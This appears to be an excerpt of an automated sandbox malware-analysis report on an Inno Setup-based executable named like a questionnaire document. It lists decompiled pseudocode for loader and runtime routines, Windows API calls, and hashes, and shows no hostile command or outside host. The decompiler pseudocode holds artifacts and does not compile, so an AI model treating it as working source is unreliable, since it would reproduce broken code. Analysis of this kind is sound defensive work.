								_t49 =  *_t8;
								_t9 = _t31 + 4; // 0x400000
								if(_t49 !=  *_t9 && _t49 != 0) {
									FreeLibrary(_t49);
								}
							}
						}
						E00407388(0x4bdb98);
						if( *((char*)(0x4bdbc0)) == 1) {
							 *0x004BDBBC();
						}
						if( *((char*)(0x4bdbc0)) != 0) {
							E0040768C(0x4bdb98);
						}
						if( *0x4bdb98 == 0) {
							if( *0x4bb038 != 0) {
								 *0x4bb038();
							}
							ExitProcess( *0x4b7000); // executed
						}
						memcpy(0x4bdb98,  *0x4bdb98, 0xc << 2);
						_t56 = _t56 + 0xc;
						0x4b7000 = 0x4b7000;
						0x4bdb98 = 0x4bdb98;
						goto L8;
					} else {
						_t20 = E004054B4();
						_t44 = _t20;
						if(_t20 == 0) {
							goto L14;
						} else {
							goto L13;
						}
						do {
							L13:
							E00405CE8(_t44);
							_t23 = E004054B4();
							_t44 = _t23;
						} while (_t23 != 0);
						goto L14;
					}
				} else {
					do {
						_t33 =  *0x4bb054; // 0x0
						 *0x4bb054 = 0;
						 *_t33();
					} while ( *0x4bb054 != 0);
					L8:
					while(1) {
					}
				}
			}










                                                                                              0x00407764
                                                                                              0x00407766
                                                                                              0x0040776b
                                                                                              0x00407772
                                                                                              0x00407772
                                                                                              0x0040777e
                                                                                              0x00407792
                                                                                              0x0040779c
                                                                                              0x0040779c
                                                                                              0x004077a5
                                                                                              0x004077c9
                                                                                              0x004077cd
                                                                                              0x004077d6
                                                                                              0x004077d6
                                                                                              0x004077dd
                                                                                              0x004077fc
                                                                                              0x004077fc
                                                                                              0x00407805
                                                                                              0x0040780c
                                                                                              0x00407811
                                                                                              0x00407813
                                                                                              0x00407818
                                                                                              0x0040781b
                                                                                              0x0040781b
                                                                                              0x0040781e
                                                                                              0x00407821
                                                                                              0x00407828
                                                                                              0x00407828
                                                                                              0x00407821
                                                                                              0x00407811
                                                                                              0x0040782f
                                                                                              0x00407838
                                                                                              0x0040783a
                                                                                              0x0040783a
                                                                                              0x00407841
                                                                                              0x00407845
                                                                                              0x00407845
                                                                                              0x0040784d
                                                                                              0x00407856
                                                                                              0x00407858
                                                                                              0x00407858
                                                                                              0x00407861
                                                                                              0x00407861
                                                                                              0x00407873
                                                                                              0x00407873
                                                                                              0x00407875
                                                                                              0x00407876
                                                                                              0x00000000
                                                                                              0x004077df
                                                                                              0x004077df
                                                                                              0x004077e4
                                                                                              0x004077e8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004077ea
                                                                                              0x004077ea
                                                                                              0x004077ec
                                                                                              0x004077f1
                                                                                              0x004077f6
                                                                                              0x004077f8
                                                                                              0x00000000
                                                                                              0x004077ea
                                                                                              0x004077b0
                                                                                              0x004077b0
                                                                                              0x004077b0
                                                                                              0x004077b9
                                                                                              0x004077be
                                                                                              0x004077c0
                                                                                              0x00000000
                                                                                              0x004077c9
                                                                                              0x00000000
                                                                                              0x004077c9

                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00407780
                                                                                              • FreeLibrary.KERNEL32(00400000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407828
                                                                                              • ExitProcess.KERNEL32(00000000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407861
                                                                                                • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
                                                                                                • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
                                                                                                • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
                                                                                                • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                                              • String ID: MZP
                                                                                              • API String ID: 3490077880-2889622443
                                                                                              • Opcode ID: 1ba9ccdc5e5ec41ea7066db700fb32a50d39e50ecd0d58aa72eac7c5645d258d
                                                                                              • Instruction ID: 4bb8ca2865ae45d0ec72c9e6ca862cba493d08d50c1d65b63798a8296780cd14
                                                                                              • Opcode Fuzzy Hash: 1ba9ccdc5e5ec41ea7066db700fb32a50d39e50ecd0d58aa72eac7c5645d258d
                                                                                              • Instruction Fuzzy Hash: 76317220E087415BE721BB7A888875B76E09B45315F14897FE541A33D2D77CB884CB6F
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00407748, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86threadCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 452 407748-407764 453 407766-407772 call 407630 call 4076b8 452->453 454 407777-40777e 452->454 453->454 456 407780-40778b GetCurrentThreadId 454->456 457 4077a1-4077a5 454->457 456->457 459 40778d-40779c call 407388 call 40768c 456->459 460 4077a7-4077ae 457->460 461 4077c9-4077cd 457->461 459->457 460->461 466 4077b0-4077c7 460->466 462 4077d9-4077dd 461->462 463 4077cf-4077d2 461->463 468 4077fc-407805 call 4073b0 462->468 469 4077df-4077e8 call 4054b4 462->469 463->462 467 4077d4-4077d6 463->467 466->461 467->462 478 407807-40780a 468->478 479 40780c-407811 468->479 469->468 480 4077ea-4077fa call 405ce8 call 4054b4 469->480 478->479 481 40782d-407838 call 407388 478->481 479->481 482 407813-407821 call 40b40c 479->482 480->468 491 40783a 481->491 492 40783d-407841 481->492 482->481 490 407823-407825 482->490 490->481 494 407827-407828 FreeLibrary 490->494 491->492 495 407843-407845 call 40768c 492->495 496 40784a-40784d 492->496 494->481 495->496 497 407866 496->497 498 40784f-407856 496->498 500 407858 498->500 501 40785e-407861 ExitProcess 498->501 500->501
                                                                                              C-Code - Quality: 86%
                                                                                              			E00407748() {
				intOrPtr* _t14;
				void* _t23;
				void* _t26;
				intOrPtr _t34;
				intOrPtr* _t36;
				void* _t50;
				struct HINSTANCE__* _t53;
				void* _t62;

				 *((intOrPtr*)(_t14 +  *_t14)) =  *((intOrPtr*)(_t14 +  *_t14)) + _t14 +  *_t14;
				if( *0x4b7004 != 0) {
					E00407630();
					E004076B8(_t50);
					 *0x4b7004 = 0;
				}
				if( *0x4bdbcc != 0 && GetCurrentThreadId() ==  *0x4bdbf4) {
					E00407388(0x4bdbc8);
					E0040768C(0x4bdbc8);
				}
				if( *0x004BDBC0 != 0 ||  *0x4bb054 == 0) {
					L9:
					if( *((char*)(0x4bdbc0)) == 2 &&  *0x4b7000 == 0) {
						 *0x004BDBA4 = 0;
					}
					if( *((char*)(0x4bdbc0)) != 0) {
						L15:
						E004073B0(); // executed
						if( *((char*)(0x4bdbc0)) <= 1 ||  *0x4b7000 != 0) {
							_t18 =  *0x004BDBA8;
							if( *0x004BDBA8 != 0) {
								E0040B40C(_t18);
								_t34 =  *((intOrPtr*)(0x4bdba8));
								_t8 = _t34 + 0x10; // 0x400000
								_t53 =  *_t8;
								_t9 = _t34 + 4; // 0x400000
								if(_t53 !=  *_t9 && _t53 != 0) {
									FreeLibrary(_t53);
								}
							}
						}
						E00407388(0x4bdb98);
						if( *((char*)(0x4bdbc0)) == 1) {
							 *0x004BDBBC();
						}
						if( *((char*)(0x4bdbc0)) != 0) {
							E0040768C(0x4bdb98);
						}
						if( *0x4bdb98 == 0) {
							if( *0x4bb038 != 0) {
								 *0x4bb038();
							}
							ExitProcess( *0x4b7000); // executed
						}
						memcpy(0x4bdb98,  *0x4bdb98, 0xc << 2);
						_t62 = _t62 + 0xc;
						0x4b7000 = 0x4b7000;
						0x4bdb98 = 0x4bdb98;
						goto L9;
					} else {
						_t23 = E004054B4();
						_t48 = _t23;
						if(_t23 == 0) {
							goto L15;
						} else {
							goto L14;
						}
						do {
							L14:
							E00405CE8(_t48);
							_t26 = E004054B4();
							_t48 = _t26;
						} while (_t26 != 0);
						goto L15;
					}
				} else {
					do {
						_t36 =  *0x4bb054; // 0x0
						 *0x4bb054 = 0;
						 *_t36();
					} while ( *0x4bb054 != 0);
					L9:
					while(1) {
					}
				}
			}











                                                                                              0x0040774a
                                                                                              0x00407764
                                                                                              0x00407766
                                                                                              0x0040776b
                                                                                              0x00407772
                                                                                              0x00407772
                                                                                              0x0040777e
                                                                                              0x00407792
                                                                                              0x0040779c
                                                                                              0x0040779c
                                                                                              0x004077a5
                                                                                              0x004077c9
                                                                                              0x004077cd
                                                                                              0x004077d6
                                                                                              0x004077d6
                                                                                              0x004077dd
                                                                                              0x004077fc
                                                                                              0x004077fc
                                                                                              0x00407805
                                                                                              0x0040780c
                                                                                              0x00407811
                                                                                              0x00407813
                                                                                              0x00407818
                                                                                              0x0040781b
                                                                                              0x0040781b
                                                                                              0x0040781e
                                                                                              0x00407821
                                                                                              0x00407828
                                                                                              0x00407828
                                                                                              0x00407821
                                                                                              0x00407811
                                                                                              0x0040782f
                                                                                              0x00407838
                                                                                              0x0040783a
                                                                                              0x0040783a
                                                                                              0x00407841
                                                                                              0x00407845
                                                                                              0x00407845
                                                                                              0x0040784d
                                                                                              0x00407856
                                                                                              0x00407858
                                                                                              0x00407858
                                                                                              0x00407861
                                                                                              0x00407861
                                                                                              0x00407873
                                                                                              0x00407873
                                                                                              0x00407875
                                                                                              0x00407876
                                                                                              0x00000000
                                                                                              0x004077df
                                                                                              0x004077df
                                                                                              0x004077e4
                                                                                              0x004077e8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004077ea
                                                                                              0x004077ea
                                                                                              0x004077ec
                                                                                              0x004077f1
                                                                                              0x004077f6
                                                                                              0x004077f8
                                                                                              0x00000000
                                                                                              0x004077ea
                                                                                              0x004077b0
                                                                                              0x004077b0
                                                                                              0x004077b0
                                                                                              0x004077b9
                                                                                              0x004077be
                                                                                              0x004077c0
                                                                                              0x00000000
                                                                                              0x004077c9
                                                                                              0x00000000
                                                                                              0x004077c9

                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00407780
                                                                                              • FreeLibrary.KERNEL32(00400000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407828
                                                                                              • ExitProcess.KERNEL32(00000000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407861
                                                                                                • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
                                                                                                • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
                                                                                                • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
                                                                                                • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                                              • String ID: MZP
                                                                                              • API String ID: 3490077880-2889622443
                                                                                              • Opcode ID: 1e4888025ee955e8cc7e0f2d2f1a13e961f3985afae2446d4f356ca194078bac
                                                                                              • Instruction ID: bfc25cbdcfe625b544084418af651039c1e49876b6b13a82c314e6a817d38f33
                                                                                              • Opcode Fuzzy Hash: 1e4888025ee955e8cc7e0f2d2f1a13e961f3985afae2446d4f356ca194078bac
                                                                                              • Instruction Fuzzy Hash: E3314D20E087419BE721BB7A888935B7BA09B05315F14897FE541A73D2D77CB884CB6F
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004B5000, Relevance: 6.0, APIs: 4, Instructions: 43threadCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 79%
                                                                                              			E004B5000(void* __ecx, void* __edx) {
				intOrPtr _t19;
				intOrPtr _t22;

				_push(_t22);
				_push(0x4b50d7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t22;
				 *0x4bb98c =  *0x4bb98c - 1;
				if( *0x4bb98c < 0) {
					E00405B74();
					E004051A8();
					SetThreadLocale(0x400); // executed
					E0040A250();
					 *0x4b700c = 2;
					 *0x4bb01c = 0x4036b0;
					 *0x4bb020 = 0x4036b8;
					 *0x4bb05a = 2;
					 *0x4bb060 = E0040CAA4();
					 *0x4bb008 = 0x4095a0;
					E00405BCC(E00405BB0());
					 *0x4bb068 = 0xd7b0;
					 *0x4bb344 = 0xd7b0;
					 *0x4bb620 = 0xd7b0;
					 *0x4bb050 = GetCommandLineW();
					 *0x4bb04c = E00403810();
					 *0x4bb97c = GetACP();
					 *0x4bb980 = 0x4b0;
					 *0x4bb044 = GetCurrentThreadId();
					E0040CAB8();
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(0x4b50de);
				return 0;
			}





                                                                                              0x004b5005
                                                                                              0x004b5006
                                                                                              0x004b500b
                                                                                              0x004b500e
                                                                                              0x004b5011
                                                                                              0x004b5018
                                                                                              0x004b501e
                                                                                              0x004b5023
                                                                                              0x004b502d
                                                                                              0x004b5032
                                                                                              0x004b5037
                                                                                              0x004b503e
                                                                                              0x004b5048
                                                                                              0x004b5052
                                                                                              0x004b505e
                                                                                              0x004b5063
                                                                                              0x004b5072
                                                                                              0x004b5077
                                                                                              0x004b5080
                                                                                              0x004b5089
                                                                                              0x004b5097
                                                                                              0x004b50a1
                                                                                              0x004b50ab
                                                                                              0x004b50b0
                                                                                              0x004b50bf
                                                                                              0x004b50c4
                                                                                              0x004b50c4
                                                                                              0x004b50cb
                                                                                              0x004b50ce
                                                                                              0x004b50d1
                                                                                              0x004b50d6

                                                                                              APIs
                                                                                              • SetThreadLocale.KERNEL32(00000400,00000000,004B50D7), ref: 004B502D
                                                                                                • Part of subcall function 0040A250: InitializeCriticalSection.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A255
                                                                                                • Part of subcall function 0040A250: GetVersion.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A263
                                                                                                • Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A28A
                                                                                                • Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A290
                                                                                                • Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2A4
                                                                                                • Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2AA
                                                                                                • Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadUILanguage,00000000,kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2BE
                                                                                                • Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2C4
                                                                                                • Part of subcall function 0040CAA4: GetSystemInfo.KERNEL32 ref: 0040CAA8
                                                                                              • GetCommandLineW.KERNEL32(00000400,00000000,004B50D7), ref: 004B5092
                                                                                                • Part of subcall function 00403810: GetStartupInfoW.KERNEL32 ref: 00403821
                                                                                              • GetACP.KERNEL32(00000400,00000000,004B50D7), ref: 004B50A6
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 004B50BA
                                                                                                • Part of subcall function 0040CAB8: GetVersion.KERNEL32(004B50C9,00000400,00000000,004B50D7), ref: 0040CAB8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc$InfoThreadVersion$CommandCriticalCurrentInitializeLineLocaleSectionStartupSystem
                                                                                              • String ID:
                                                                                              • API String ID: 2740004594-0
                                                                                              • Opcode ID: aeeb1ef19c021384e5e919f33d2f1f63d534ea4b25bb20b8f726cabb6b9d9f22
                                                                                              • Instruction ID: 4c04e7183c3d5c6504f231a905193e891933426fc174ea8e71756e1f90614aff
                                                                                              • Opcode Fuzzy Hash: aeeb1ef19c021384e5e919f33d2f1f63d534ea4b25bb20b8f726cabb6b9d9f22
                                                                                              • Instruction Fuzzy Hash: 46111CB04047449FE311BF76A8062267BA8EB05309B508A7FE110662E2EBFD15048FEE
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004AEFE8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 73%
                                                                                              			E004AEFE8(void* __eax, long __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char* _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				int _t30;
				intOrPtr _t63;
				void* _t71;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t76;

				_t71 = __edi;
				_t54 = __ebx;
				_t75 = _t76;
				_t55 = 4;
				do {
					_push(0);
					_push(0);
					_t55 = _t55 - 1;
				} while (_t55 != 0);
				_push(_t55);
				_push(__ebx);
				_t73 = __eax;
				_t78 = 0;
				_push(_t75);
				_push(0x4af0e1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				while(1) {
					E00422D70( &_v12, _t54, _t55, _t78); // executed
					_t55 = L".tmp";
					E004AEEC8(0, _t54, L".tmp", _v12, _t71, _t73,  &_v8); // executed
					_t30 = CreateDirectoryW(E004084EC(_v8), 0); // executed
					if(_t30 != 0) {
						break;
					}
					_t54 = GetLastError();
					_t78 = _t54 - 0xb7;
					if(_t54 != 0xb7) {
						E00426F08(0x3d,  &_v32, _v8);
						_v28 = _v32;
						E00419E18( &_v36, _t54, 0);
						_v24 = _v36;
						E004232EC(_t54,  &_v40);
						_v20 = _v40;
						E00426ED8(0x81, 2,  &_v28,  &_v16);
						_t55 = _v16;
						E0041F264(_v16, 1);
						E0040711C();
					}
				}
				E00407E00(_t73, _v8);
				__eflags = 0;
				_pop(_t63);
				 *[fs:eax] = _t63;
				_push(E004AF0E8);
				E00407A80( &_v40, 3);
				return E00407A80( &_v16, 3);
			}


















                                                                                              0x004aefe8
                                                                                              0x004aefe8
                                                                                              0x004aefe9
                                                                                              0x004aefeb
                                                                                              0x004aeff0
                                                                                              0x004aeff0
                                                                                              0x004aeff2
                                                                                              0x004aeff4
                                                                                              0x004aeff4
                                                                                              0x004aeff7
                                                                                              0x004aeff8
                                                                                              0x004aeffa
                                                                                              0x004aeffc
                                                                                              0x004aeffe
                                                                                              0x004aefff
                                                                                              0x004af004
                                                                                              0x004af007
                                                                                              0x004af00a
                                                                                              0x004af011
                                                                                              0x004af019
                                                                                              0x004af020
                                                                                              0x004af030
                                                                                              0x004af037
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004af03e
                                                                                              0x004af040
                                                                                              0x004af046
                                                                                              0x004af056
                                                                                              0x004af05e
                                                                                              0x004af06a
                                                                                              0x004af072
                                                                                              0x004af07a
                                                                                              0x004af082
                                                                                              0x004af091
                                                                                              0x004af096
                                                                                              0x004af0a0
                                                                                              0x004af0a5
                                                                                              0x004af0a5
                                                                                              0x004af046
                                                                                              0x004af0b4
                                                                                              0x004af0b9
                                                                                              0x004af0bb
                                                                                              0x004af0be
                                                                                              0x004af0c1
                                                                                              0x004af0ce
                                                                                              0x004af0e0

                                                                                              APIs
                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,004AF0E1,?,?,?,00000003,00000000,00000000,?,004B619F), ref: 004AF030
                                                                                              • GetLastError.KERNEL32(00000000,00000000,?,00000000,004AF0E1,?,?,?,00000003,00000000,00000000,?,004B619F), ref: 004AF039
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                              • String ID: .tmp
                                                                                              • API String ID: 1375471231-2986845003
                                                                                              • Opcode ID: b866ae3ac5566b90e4d091c6d0119bd5c5d6e6cd69059738e462e2ab807557f0
                                                                                              • Instruction ID: 89b964d67460c442e7c67535b057b8112791baa86db9a38931a927ffd746d2a8
                                                                                              • Opcode Fuzzy Hash: b866ae3ac5566b90e4d091c6d0119bd5c5d6e6cd69059738e462e2ab807557f0
                                                                                              • Instruction Fuzzy Hash: 3A218735A041089BDB00EBE1C842ADFB3B9EB49304F50447BF800F7381DA386E058BA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040E450, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 551 40e450-40e4a4 call 405740 CreateWindowExW call 405730
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040E450(long __eax, WCHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
				WCHAR* _v8;
				void* _t13;
				struct HWND__* _t24;
				WCHAR* _t29;
				long _t32;

				_v8 = _t29;
				_t32 = __eax;
				_t13 = E00405740();
				_t24 = CreateWindowExW(_t32, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				E00405730(_t13);
				return _t24;
			}








                                                                                              0x0040e457
                                                                                              0x0040e45c
                                                                                              0x0040e45e
                                                                                              0x0040e48f
                                                                                              0x0040e498
                                                                                              0x0040e4a4

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateWindow
                                                                                              • String ID: InnoSetupLdrWindow$STATIC
                                                                                              • API String ID: 716092398-2209255943
                                                                                              • Opcode ID: 4ba199ab3c1e041c72a50ebd66c3ee798d5f8225e8fee486b5eb3d70e3749009
                                                                                              • Instruction ID: 770f17d29583ffea265d4876c6cd55b491c436ce5e2cc0b006eebdc9bc405b2a
                                                                                              • Opcode Fuzzy Hash: 4ba199ab3c1e041c72a50ebd66c3ee798d5f8225e8fee486b5eb3d70e3749009
                                                                                              • Instruction Fuzzy Hash: 73F07FB6600118AF9B84DE9EDC85E9B77ECEB4D264B05412ABA08E7201D634ED118BA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004AF1B4, Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 556 4af1b4-4af1c5 557 4af20e-4af213 556->557 558 4af1c7-4af1c8 556->558 559 4af1ca-4af1cd 558->559 560 4af1da-4af1dd 559->560 561 4af1cf-4af1d8 Sleep 559->561 562 4af1e8-4af1ed call 427154 560->562 563 4af1df-4af1e3 Sleep 560->563 561->562 565 4af1f2-4af1f4 562->565 563->562 565->557 566 4af1f6-4af1fe GetLastError 565->566 566->557 567 4af200-4af208 GetLastError 566->567 567->557 568 4af20a-4af20c 567->568 568->557 568->559
                                                                                              C-Code - Quality: 100%
                                                                                              			E004AF1B4(long __eax, intOrPtr __edx, long _a4, long _a8) {
				intOrPtr _v8;
				long _t5;
				long _t9;
				void* _t10;
				void* _t13;
				void* _t15;
				void* _t16;

				_t5 = __eax;
				_v8 = __edx;
				_t9 = __eax;
				_t15 = _t10 - 1;
				if(_t15 < 0) {
					L10:
					return _t5;
				}
				_t16 = _t15 + 1;
				_t13 = 0;
				while(1) {
					_t19 = _t13 - 1;
					if(_t13 != 1) {
						__eflags = _t13 - 1;
						if(__eflags > 0) {
							Sleep(_a4);
						}
					} else {
						Sleep(_a8);
					}
					_t5 = E00427154(_t9, _v8, _t19); // executed
					if(_t5 != 0) {
						goto L10;
					}
					_t5 = GetLastError();
					if(_t5 == 2) {
						goto L10;
					}
					_t5 = GetLastError();
					if(_t5 == 3) {
						goto L10;
					}
					_t13 = _t13 + 1;
					_t16 = _t16 - 1;
					if(_t16 != 0) {
						continue;
					}
					goto L10;
				}
				goto L10;
			}










                                                                                              0x004af1b4
                                                                                              0x004af1bb
                                                                                              0x004af1be
                                                                                              0x004af1c2
                                                                                              0x004af1c5
                                                                                              0x004af213
                                                                                              0x004af213
                                                                                              0x004af213
                                                                                              0x004af1c7
                                                                                              0x004af1c8
                                                                                              0x004af1ca
                                                                                              0x004af1ca
                                                                                              0x004af1cd
                                                                                              0x004af1da
                                                                                              0x004af1dd
                                                                                              0x004af1e3
                                                                                              0x004af1e3
                                                                                              0x004af1cf
                                                                                              0x004af1d3
                                                                                              0x004af1d3
                                                                                              0x004af1ed
                                                                                              0x004af1f4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004af1f6
                                                                                              0x004af1fe
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004af200
                                                                                              0x004af208
                                                                                              0x00000000
                                                                                              0x00000000
